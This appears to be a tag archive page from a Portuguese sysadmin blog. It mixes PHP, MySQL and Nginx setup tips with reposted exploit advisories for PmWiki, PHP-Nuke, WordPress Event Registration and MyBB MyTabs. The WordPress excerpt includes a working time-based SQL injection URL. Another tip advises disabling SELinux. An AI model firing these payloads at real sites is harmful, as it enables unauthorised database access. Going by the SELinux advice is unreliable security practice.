Browsed by
Tag: php

PHP Warning: Module ‘timezonedb’ already loaded in Unknown on line 0

PHP Warning: Module ‘timezonedb’ already loaded in Unknown on line 0

Para resolver isto é simples, entre no arquivo php.ini (em rhel based pode ser encontrado em /usr/local/lib/php.ini), bastando apenas entrar e remover as linhas duplicadas que contém: extension=”timezonedb.so” Removendo as linhas duplicadas rode: service httpd restart ou /etc/init.d/apache2 restart e curta!

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Depois de instalar tudo em seu servidor Centos (falo de ambiente lamp2 no centos), ao instalar o ioncube você percebe a mensagem de erro: Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so:  /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied Calma, nem você é do mal e nem seu servidor, isso ocorre por que o SELinux está monitorando as coisas, permissões e etc, teremos de desativar o danado :(, Para desativarmos o SELINUX devemos seguir os passos abaixo: vim

Read More Read More

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

<?php /*     ————————————————————-     PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit     ————————————————————-          author……………: Egidio Romano aka EgiX     mail……………..: n0b0d13s[at]gmail[dot]com     software link……..: http://www.pmwiki.org/     affected versions….: from 2.0.0 to 2.2.34          +————————————————————————-+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be not responsible for any damage. |     +————————————————————————-+          [-] vulnerable code in PageListSort() function defined into /scripts/pagelist.php          452.      $code = ”;     453.      foreach($opt[‘=order’] as…

Read More Read More

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

#!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, #               Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # —- # Why have I decided to publish this? # Because some nice guys (Dr.0rYX and…

Read More Read More

Como remover caracteres ^M de arquivos usando VIM/VI (vale para qualquer UNIX-like)

Como remover caracteres ^M de arquivos usando VIM/VI (vale para qualquer UNIX-like)

Bom, galera, quem aqui nunca abriu um arquivo no console que apresentou caracteres ^M? Normalmente essas pragas aparecem ou com o Dreamweaver ou com Word (cópia) – Área de Transferência, depois os caras costumam enviar por ftp e daí já sabe né? Se abrir o arquivo via console tá lá a praga! Bem, a dica que nós do AppUnix vamos dar é simples, porém eficaz. Abrindo seu vi/vim (no exemplo abaixo iremos dar o nome do arquivo como sendo crash.php):…

Read More Read More

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

Este artigo vai parecer muito com a instalação do apache, php e mysql sob mac os x snow leopard, porém existem algumas particularidades que precisam ser detalhadas. Antemão parte do artigo do mamp sob snow leopard será copiado, depois, iremos detalhar pontos MUITO importantes para que tudo funcione corretamente. Estamos testando em um hackintosh LION (10.7.1), literalmente current (updates mais novas). Vamos lá: No outro artigo, para habilitarmos o apache usamos o comando com poder de root (sudo) para ativar…

Read More Read More

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

Bom, pessoal, nós do app gostaríamos de detalhar algo. NÃO precisa ter senha de root para operar o mysql, isto dá-se em detrimento ao poder de root, porém com certas restrições que cada usuário do sistema possui. Se eu quiser entrar no mysql para criar base de dados e trabalhar com o bd (após seguir nosso how to de instalação do apache, php, e mysql no mac os x lion ou instalação do apache, php, e mysql no mac os…

Read More Read More

WordPress Event Registration plugin <= 5.4.3 SQL Injection

WordPress Event Registration plugin <= 5.4.3 SQL Injection

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * FROM ” . $events_detail_tbl . ” WHERE id=’$id'”; $result = mysql_query($sql); Fonte: http://www.exploit-db.com/exploits/17751/

Como instalar Nginx PHP5 e Mysql no CentOS 5.6

Como instalar Nginx PHP5 e Mysql no CentOS 5.6

A pronúncia correta do Nginx é “engin-ex”, mas vamos nos ater aos comandos que é o melhor que podemos fazer, né? NÃO sem antes falar que essa besteirinha segura “somente” milhões de acessos por dia ao site WordPress, por isso CONFIE e USE nginx sem QUALQUER medo! (existe plugin pago e grátis para o Cpanel, mas recomendamos que use o plugin free sob CENTOS senão seu cpanel vai sobrescrever os confs de vhosts do nginx). Primeiro estou imaginando que seu…

Read More Read More

MyBB MyTabs (plugin) 0day SQL injection vulnerability

MyBB MyTabs (plugin) 0day SQL injection vulnerability

===================================================================== MyBB 0day \ MyTabs (plugin) SQL injection vulnerability ===================================================================== # Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com # Date : 01 \ 08 \ 2011 # Tested on : Windows XP , Linux # Category : web apps # Vulnerable Software Link : http://mods.mybb.com/view/mytabs # Google dork : Use your mind kid ^_^ ! Vulnerability : $~ http://localhost/mybbpath/index.php?tab=[SQLi] ————————————— #…

Read More Read More